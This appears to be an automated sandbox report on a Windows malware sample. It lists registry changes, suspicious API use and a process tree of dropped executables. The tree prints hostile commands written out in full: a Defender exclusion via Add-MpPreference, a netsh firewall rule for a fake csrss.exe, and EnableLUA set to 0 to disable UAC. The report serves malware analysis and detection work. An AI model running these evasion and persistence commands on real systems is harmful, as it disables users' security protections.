Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-292 = "Central European Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-162 = "Central Standard Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time"	bFP7y9UvwrglmZsCw0P01TLb.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-572 = "China Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-192 = "Mountain Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-335 = "Jordan Standard Time"	bFP7y9UvwrglmZsCw0P01TLb.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2891 = "Sudan Daylight Time"	bFP7y9UvwrglmZsCw0P01TLb.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"	DslOhGm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-384 = "Namibia Daylight Time"	bFP7y9UvwrglmZsCw0P01TLb.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-222 = "Alaskan Standard Time"	bFP7y9UvwrglmZsCw0P01TLb.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket	DslOhGm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-571 = "China Daylight Time"	bFP7y9UvwrglmZsCw0P01TLb.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-542 = "Myanmar Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-561 = "SE Asia Daylight Time"	bFP7y9UvwrglmZsCw0P01TLb.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-2002 = "Cabo Verde Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-2432 = "Cuba Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-411 = "E. Africa Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-491 = "India Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-401 = "Arabic Daylight Time"	bFP7y9UvwrglmZsCw0P01TLb.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time"	bFP7y9UvwrglmZsCw0P01TLb.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-842 = "Argentina Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-2372 = "Easter Island Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-541 = "Myanmar Daylight Time"	bFP7y9UvwrglmZsCw0P01TLb.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exePBodhKQkwYo4944fGYN6aCTn.exebFP7y9UvwrglmZsCw0P01TLb.exerun.exepowershell.exepowershell.execmd.exePBodhKQkwYo4944fGYN6aCTn.exebFP7y9UvwrglmZsCw0P01TLb.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe

pid	process
3284	powershell.exe
3284	powershell.exe
4984	powershell.exe
576	powershell.exe
576	powershell.exe
4984	powershell.exe
3144	PBodhKQkwYo4944fGYN6aCTn.exe
3144	PBodhKQkwYo4944fGYN6aCTn.exe
1596	bFP7y9UvwrglmZsCw0P01TLb.exe
1596	bFP7y9UvwrglmZsCw0P01TLb.exe
2496	run.exe
2496	run.exe
4892	powershell.exe
3464	powershell.exe
4892	powershell.exe
3464	powershell.exe
2468	cmd.exe
2468	cmd.exe
4996	PBodhKQkwYo4944fGYN6aCTn.exe
4996	PBodhKQkwYo4944fGYN6aCTn.exe
4996	PBodhKQkwYo4944fGYN6aCTn.exe
4996	PBodhKQkwYo4944fGYN6aCTn.exe
4996	PBodhKQkwYo4944fGYN6aCTn.exe
4996	PBodhKQkwYo4944fGYN6aCTn.exe
4996	PBodhKQkwYo4944fGYN6aCTn.exe
4996	PBodhKQkwYo4944fGYN6aCTn.exe
4996	PBodhKQkwYo4944fGYN6aCTn.exe
4996	PBodhKQkwYo4944fGYN6aCTn.exe
3692	bFP7y9UvwrglmZsCw0P01TLb.exe
3692	bFP7y9UvwrglmZsCw0P01TLb.exe
3692	bFP7y9UvwrglmZsCw0P01TLb.exe
3692	bFP7y9UvwrglmZsCw0P01TLb.exe
3692	bFP7y9UvwrglmZsCw0P01TLb.exe
3692	bFP7y9UvwrglmZsCw0P01TLb.exe
3692	bFP7y9UvwrglmZsCw0P01TLb.exe
3692	bFP7y9UvwrglmZsCw0P01TLb.exe
3692	bFP7y9UvwrglmZsCw0P01TLb.exe
3692	bFP7y9UvwrglmZsCw0P01TLb.exe
2824	powershell.exe
2824	powershell.exe
1144	powershell.exe
1144	powershell.exe
5116	powershell.exe
5116	powershell.exe
5116	powershell.exe
384	powershell.exe
384	powershell.exe
384	powershell.exe
1140	powershell.exe
1140	powershell.exe
1140	powershell.exe
3852	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
3852	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
3852	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
3852	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
3852	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
3852	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
3852	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
3852	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
3852	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
3852	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
3852	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
3852	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
3852	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe

Suspicious behavior: MapViewOfSection 3 IoCs

Processes:

run.execmd.exe

pid process

2496 run.exe
2468 cmd.exe
2468 cmd.exe

pid	process
2496	run.exe
2468	cmd.exe
2468	cmd.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exemsbuild.exepowershell.exepowershell.exePBodhKQkwYo4944fGYN6aCTn.exebFP7y9UvwrglmZsCw0P01TLb.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeMSBuild.exepowershell.exeSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exepowershell.exepowershell.execsrss.exepowershell.exeWMIC.exesc.exe

description	pid	process
Token: SeDebugPrivilege	3284	powershell.exe
Token: SeDebugPrivilege	4992	msbuild.exe
Token: SeDebugPrivilege	4984	powershell.exe
Token: SeDebugPrivilege	576	powershell.exe
Token: SeDebugPrivilege	3144	PBodhKQkwYo4944fGYN6aCTn.exe
Token: SeImpersonatePrivilege	3144	PBodhKQkwYo4944fGYN6aCTn.exe
Token: SeDebugPrivilege	1596	bFP7y9UvwrglmZsCw0P01TLb.exe
Token: SeImpersonatePrivilege	1596	bFP7y9UvwrglmZsCw0P01TLb.exe
Token: SeDebugPrivilege	4892	powershell.exe
Token: SeDebugPrivilege	3464	powershell.exe
Token: SeDebugPrivilege	2824	powershell.exe
Token: SeDebugPrivilege	1144	powershell.exe
Token: SeDebugPrivilege	5116	powershell.exe
Token: SeDebugPrivilege	384	powershell.exe
Token: SeDebugPrivilege	3524	MSBuild.exe
Token: SeDebugPrivilege	1140	powershell.exe
Token: SeDebugPrivilege	3852	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
Token: SeDebugPrivilege	2732	powershell.exe
Token: SeDebugPrivilege	4848	powershell.exe
Token: SeSystemEnvironmentPrivilege	2916	csrss.exe
Token: SeDebugPrivilege	4444	powershell.exe
Token: SeIncreaseQuotaPrivilege	3048	WMIC.exe
Token: SeSecurityPrivilege	3048	WMIC.exe
Token: SeTakeOwnershipPrivilege	3048	WMIC.exe
Token: SeLoadDriverPrivilege	3048	WMIC.exe
Token: SeSystemProfilePrivilege	3048	WMIC.exe
Token: SeSystemtimePrivilege	3048	WMIC.exe
Token: SeProfSingleProcessPrivilege	3048	WMIC.exe
Token: SeIncBasePriorityPrivilege	3048	WMIC.exe
Token: SeCreatePagefilePrivilege	3048	WMIC.exe
Token: SeBackupPrivilege	3048	WMIC.exe
Token: SeRestorePrivilege	3048	WMIC.exe
Token: SeShutdownPrivilege	3048	WMIC.exe
Token: SeDebugPrivilege	3048	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3048	WMIC.exe
Token: SeRemoteShutdownPrivilege	3048	WMIC.exe
Token: SeUndockPrivilege	3048	WMIC.exe
Token: SeManageVolumePrivilege	3048	WMIC.exe
Token: 33	3048	WMIC.exe
Token: 34	3048	WMIC.exe
Token: 35	3048	WMIC.exe
Token: 36	3048	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3048	WMIC.exe
Token: SeSecurityPrivilege	3048	WMIC.exe
Token: SeTakeOwnershipPrivilege	3048	WMIC.exe
Token: SeLoadDriverPrivilege	3048	WMIC.exe
Token: SeSystemProfilePrivilege	3048	WMIC.exe
Token: SeSystemtimePrivilege	3048	WMIC.exe
Token: SeProfSingleProcessPrivilege	3048	WMIC.exe
Token: SeIncBasePriorityPrivilege	3048	WMIC.exe
Token: SeCreatePagefilePrivilege	3048	WMIC.exe
Token: SeBackupPrivilege	3048	WMIC.exe
Token: SeRestorePrivilege	3048	WMIC.exe
Token: SeShutdownPrivilege	3048	WMIC.exe
Token: SeDebugPrivilege	3048	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3048	WMIC.exe
Token: SeRemoteShutdownPrivilege	3048	WMIC.exe
Token: SeUndockPrivilege	3048	WMIC.exe
Token: SeManageVolumePrivilege	3048	WMIC.exe
Token: 33	3048	WMIC.exe
Token: 34	3048	WMIC.exe
Token: 35	3048	WMIC.exe
Token: 36	3048	WMIC.exe
Token: SeSecurityPrivilege	4760	sc.exe

Suspicious use of FindShellTrayWindow 7 IoCs

Processes:

u384.3.exe

pid process

3624 u384.3.exe
3624 u384.3.exe
3624 u384.3.exe
3624 u384.3.exe
3624 u384.3.exe
3624 u384.3.exe
3624 u384.3.exe
Suspicious use of SendNotifyMessage 7 IoCs

Processes:

u384.3.exe

pid process

3624 u384.3.exe
3624 u384.3.exe
3624 u384.3.exe
3624 u384.3.exe
3624 u384.3.exe
3624 u384.3.exe
3624 u384.3.exe
Suspicious use of SetWindowsHookEx 3 IoCs

Processes:

run.exeMSBuild.exe

pid process

2496 run.exe
2496 run.exe
3524 MSBuild.exe

pid	process
3624	u384.3.exe
3624	u384.3.exe
3624	u384.3.exe
3624	u384.3.exe
3624	u384.3.exe
3624	u384.3.exe
3624	u384.3.exe

pid	process
3624	u384.3.exe
3624	u384.3.exe
3624	u384.3.exe
3624	u384.3.exe
3624	u384.3.exe
3624	u384.3.exe
3624	u384.3.exe

pid	process
2496	run.exe
2496	run.exe
3524	MSBuild.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

f6bfa172fb2a124980f8134f6b5c765e7af52133a0c828e87d05b40a1a3f5005.exemsbuild.exePBodhKQkwYo4944fGYN6aCTn.exebFP7y9UvwrglmZsCw0P01TLb.exeAHnLC4HTPoTQBvfFYTDQGgzq.exerun.exebFP7y9UvwrglmZsCw0P01TLb.exePBodhKQkwYo4944fGYN6aCTn.execmd.execmd.exe

description	pid	process	target process
PID 4564 wrote to memory of 3284	4564	f6bfa172fb2a124980f8134f6b5c765e7af52133a0c828e87d05b40a1a3f5005.exe	powershell.exe
PID 4564 wrote to memory of 3284	4564	f6bfa172fb2a124980f8134f6b5c765e7af52133a0c828e87d05b40a1a3f5005.exe	powershell.exe
PID 4564 wrote to memory of 1480	4564	f6bfa172fb2a124980f8134f6b5c765e7af52133a0c828e87d05b40a1a3f5005.exe	installutil.exe
PID 4564 wrote to memory of 1480	4564	f6bfa172fb2a124980f8134f6b5c765e7af52133a0c828e87d05b40a1a3f5005.exe	installutil.exe
PID 4564 wrote to memory of 1480	4564	f6bfa172fb2a124980f8134f6b5c765e7af52133a0c828e87d05b40a1a3f5005.exe	installutil.exe
PID 4564 wrote to memory of 4992	4564	f6bfa172fb2a124980f8134f6b5c765e7af52133a0c828e87d05b40a1a3f5005.exe	msbuild.exe
PID 4564 wrote to memory of 4992	4564	f6bfa172fb2a124980f8134f6b5c765e7af52133a0c828e87d05b40a1a3f5005.exe	msbuild.exe
PID 4564 wrote to memory of 4992	4564	f6bfa172fb2a124980f8134f6b5c765e7af52133a0c828e87d05b40a1a3f5005.exe	msbuild.exe
PID 4564 wrote to memory of 4992	4564	f6bfa172fb2a124980f8134f6b5c765e7af52133a0c828e87d05b40a1a3f5005.exe	msbuild.exe
PID 4564 wrote to memory of 4992	4564	f6bfa172fb2a124980f8134f6b5c765e7af52133a0c828e87d05b40a1a3f5005.exe	msbuild.exe
PID 4564 wrote to memory of 4992	4564	f6bfa172fb2a124980f8134f6b5c765e7af52133a0c828e87d05b40a1a3f5005.exe	msbuild.exe
PID 4564 wrote to memory of 4992	4564	f6bfa172fb2a124980f8134f6b5c765e7af52133a0c828e87d05b40a1a3f5005.exe	msbuild.exe
PID 4564 wrote to memory of 4992	4564	f6bfa172fb2a124980f8134f6b5c765e7af52133a0c828e87d05b40a1a3f5005.exe	msbuild.exe
PID 4564 wrote to memory of 1184	4564	f6bfa172fb2a124980f8134f6b5c765e7af52133a0c828e87d05b40a1a3f5005.exe	msbuild.exe
PID 4564 wrote to memory of 1184	4564	f6bfa172fb2a124980f8134f6b5c765e7af52133a0c828e87d05b40a1a3f5005.exe	msbuild.exe
PID 4564 wrote to memory of 1184	4564	f6bfa172fb2a124980f8134f6b5c765e7af52133a0c828e87d05b40a1a3f5005.exe	msbuild.exe
PID 4992 wrote to memory of 4180	4992	msbuild.exe	AHnLC4HTPoTQBvfFYTDQGgzq.exe
PID 4992 wrote to memory of 4180	4992	msbuild.exe	AHnLC4HTPoTQBvfFYTDQGgzq.exe
PID 4992 wrote to memory of 4180	4992	msbuild.exe	AHnLC4HTPoTQBvfFYTDQGgzq.exe
PID 4992 wrote to memory of 3144	4992	msbuild.exe	PBodhKQkwYo4944fGYN6aCTn.exe
PID 4992 wrote to memory of 3144	4992	msbuild.exe	PBodhKQkwYo4944fGYN6aCTn.exe
PID 4992 wrote to memory of 3144	4992	msbuild.exe	PBodhKQkwYo4944fGYN6aCTn.exe
PID 4992 wrote to memory of 1596	4992	msbuild.exe	bFP7y9UvwrglmZsCw0P01TLb.exe
PID 4992 wrote to memory of 1596	4992	msbuild.exe	bFP7y9UvwrglmZsCw0P01TLb.exe
PID 4992 wrote to memory of 1596	4992	msbuild.exe	bFP7y9UvwrglmZsCw0P01TLb.exe
PID 3144 wrote to memory of 576	3144	PBodhKQkwYo4944fGYN6aCTn.exe	powershell.exe
PID 3144 wrote to memory of 576	3144	PBodhKQkwYo4944fGYN6aCTn.exe	powershell.exe
PID 3144 wrote to memory of 576	3144	PBodhKQkwYo4944fGYN6aCTn.exe	powershell.exe
PID 1596 wrote to memory of 4984	1596	bFP7y9UvwrglmZsCw0P01TLb.exe	powershell.exe
PID 1596 wrote to memory of 4984	1596	bFP7y9UvwrglmZsCw0P01TLb.exe	powershell.exe
PID 1596 wrote to memory of 4984	1596	bFP7y9UvwrglmZsCw0P01TLb.exe	powershell.exe
PID 4180 wrote to memory of 476	4180	AHnLC4HTPoTQBvfFYTDQGgzq.exe	u384.0.exe
PID 4180 wrote to memory of 476	4180	AHnLC4HTPoTQBvfFYTDQGgzq.exe	u384.0.exe
PID 4180 wrote to memory of 476	4180	AHnLC4HTPoTQBvfFYTDQGgzq.exe	u384.0.exe
PID 4180 wrote to memory of 2496	4180	AHnLC4HTPoTQBvfFYTDQGgzq.exe	run.exe
PID 4180 wrote to memory of 2496	4180	AHnLC4HTPoTQBvfFYTDQGgzq.exe	run.exe
PID 4180 wrote to memory of 2496	4180	AHnLC4HTPoTQBvfFYTDQGgzq.exe	run.exe
PID 2496 wrote to memory of 2468	2496	run.exe	cmd.exe
PID 2496 wrote to memory of 2468	2496	run.exe	cmd.exe
PID 2496 wrote to memory of 2468	2496	run.exe	cmd.exe
PID 2496 wrote to memory of 2468	2496	run.exe	cmd.exe
PID 3692 wrote to memory of 4892	3692	bFP7y9UvwrglmZsCw0P01TLb.exe	powershell.exe
PID 3692 wrote to memory of 4892	3692	bFP7y9UvwrglmZsCw0P01TLb.exe	powershell.exe
PID 3692 wrote to memory of 4892	3692	bFP7y9UvwrglmZsCw0P01TLb.exe	powershell.exe
PID 4996 wrote to memory of 3464	4996	PBodhKQkwYo4944fGYN6aCTn.exe	powershell.exe
PID 4996 wrote to memory of 3464	4996	PBodhKQkwYo4944fGYN6aCTn.exe	powershell.exe
PID 4996 wrote to memory of 3464	4996	PBodhKQkwYo4944fGYN6aCTn.exe	powershell.exe
PID 4996 wrote to memory of 1168	4996	PBodhKQkwYo4944fGYN6aCTn.exe	cmd.exe
PID 4996 wrote to memory of 1168	4996	PBodhKQkwYo4944fGYN6aCTn.exe	cmd.exe
PID 3692 wrote to memory of 3424	3692	bFP7y9UvwrglmZsCw0P01TLb.exe	cmd.exe
PID 3692 wrote to memory of 3424	3692	bFP7y9UvwrglmZsCw0P01TLb.exe	cmd.exe
PID 1168 wrote to memory of 4020	1168	cmd.exe	netsh.exe
PID 1168 wrote to memory of 4020	1168	cmd.exe	netsh.exe
PID 3424 wrote to memory of 1492	3424	cmd.exe	netsh.exe
PID 3424 wrote to memory of 1492	3424	cmd.exe	netsh.exe
PID 3692 wrote to memory of 2824	3692	bFP7y9UvwrglmZsCw0P01TLb.exe	powershell.exe
PID 3692 wrote to memory of 2824	3692	bFP7y9UvwrglmZsCw0P01TLb.exe	powershell.exe
PID 3692 wrote to memory of 2824	3692	bFP7y9UvwrglmZsCw0P01TLb.exe	powershell.exe
PID 4996 wrote to memory of 1144	4996	PBodhKQkwYo4944fGYN6aCTn.exe	powershell.exe
PID 4996 wrote to memory of 1144	4996	PBodhKQkwYo4944fGYN6aCTn.exe	powershell.exe
PID 4996 wrote to memory of 1144	4996	PBodhKQkwYo4944fGYN6aCTn.exe	powershell.exe
PID 3692 wrote to memory of 5116	3692	bFP7y9UvwrglmZsCw0P01TLb.exe	powershell.exe
PID 3692 wrote to memory of 5116	3692	bFP7y9UvwrglmZsCw0P01TLb.exe	powershell.exe
PID 3692 wrote to memory of 5116	3692	bFP7y9UvwrglmZsCw0P01TLb.exe	powershell.exe

System policy modification 1 TTPs 1 IoCs

evasion

Modify Registry

Processes:

f6bfa172fb2a124980f8134f6b5c765e7af52133a0c828e87d05b40a1a3f5005.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	f6bfa172fb2a124980f8134f6b5c765e7af52133a0c828e87d05b40a1a3f5005.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\f6bfa172fb2a124980f8134f6b5c765e7af52133a0c828e87d05b40a1a3f5005.exe
"C:\Users\Admin\AppData\Local\Temp\f6bfa172fb2a124980f8134f6b5c765e7af52133a0c828e87d05b40a1a3f5005.exe"
1⤵
- UAC bypass
- Windows security bypass
- Windows security modification
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
- System policy modification
PID:4564
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\f6bfa172fb2a124980f8134f6b5c765e7af52133a0c828e87d05b40a1a3f5005.exe" -Force
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3284
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
  2⤵
  PID:1480
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
  2⤵
  - Drops startup file
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4992
- - C:\Users\Admin\Pictures\AHnLC4HTPoTQBvfFYTDQGgzq.exe
    "C:\Users\Admin\Pictures\AHnLC4HTPoTQBvfFYTDQGgzq.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:4180
  - - C:\Users\Admin\AppData\Local\Temp\u384.0.exe
      "C:\Users\Admin\AppData\Local\Temp\u384.0.exe"
      4⤵
      Executes dropped EXE
      PID:476
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 476 -s 1096
        5⤵
        Program crash
        
        PID:3272
  - - C:\Users\Admin\AppData\Local\Temp\u384.2\run.exe
      "C:\Users\Admin\AppData\Local\Temp\u384.2\run.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: MapViewOfSection
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:2496
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\SysWOW64\cmd.exe
        5⤵
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        
        PID:2468
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:3524
  - - C:\Users\Admin\AppData\Local\Temp\u384.3.exe
      "C:\Users\Admin\AppData\Local\Temp\u384.3.exe"
      4⤵
      Executes dropped EXE
      Checks SCSI registry key(s)
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      PID:3624
    - - C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3852
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4180 -s 1164
      4⤵
      Program crash
      PID:1660
- - C:\Users\Admin\Pictures\PBodhKQkwYo4944fGYN6aCTn.exe
    "C:\Users\Admin\Pictures\PBodhKQkwYo4944fGYN6aCTn.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3144
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:576
  - - C:\Users\Admin\Pictures\PBodhKQkwYo4944fGYN6aCTn.exe
      "C:\Users\Admin\Pictures\PBodhKQkwYo4944fGYN6aCTn.exe"
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      Checks for VirtualBox DLLs, possible anti-VM trick
      Drops file in Windows directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:4996
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3464
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1168
      - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        6⤵
        Modifies Windows Firewall
        
        PID:4020
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1144
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:384
- - C:\Users\Admin\Pictures\bFP7y9UvwrglmZsCw0P01TLb.exe
    "C:\Users\Admin\Pictures\bFP7y9UvwrglmZsCw0P01TLb.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1596
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4984
  - - C:\Users\Admin\Pictures\bFP7y9UvwrglmZsCw0P01TLb.exe
      "C:\Users\Admin\Pictures\bFP7y9UvwrglmZsCw0P01TLb.exe"
      4⤵
      Windows security bypass
      Executes dropped EXE
      Windows security modification
      Adds Run key to start application
      Checks for VirtualBox DLLs, possible anti-VM trick
      Drops file in Windows directory
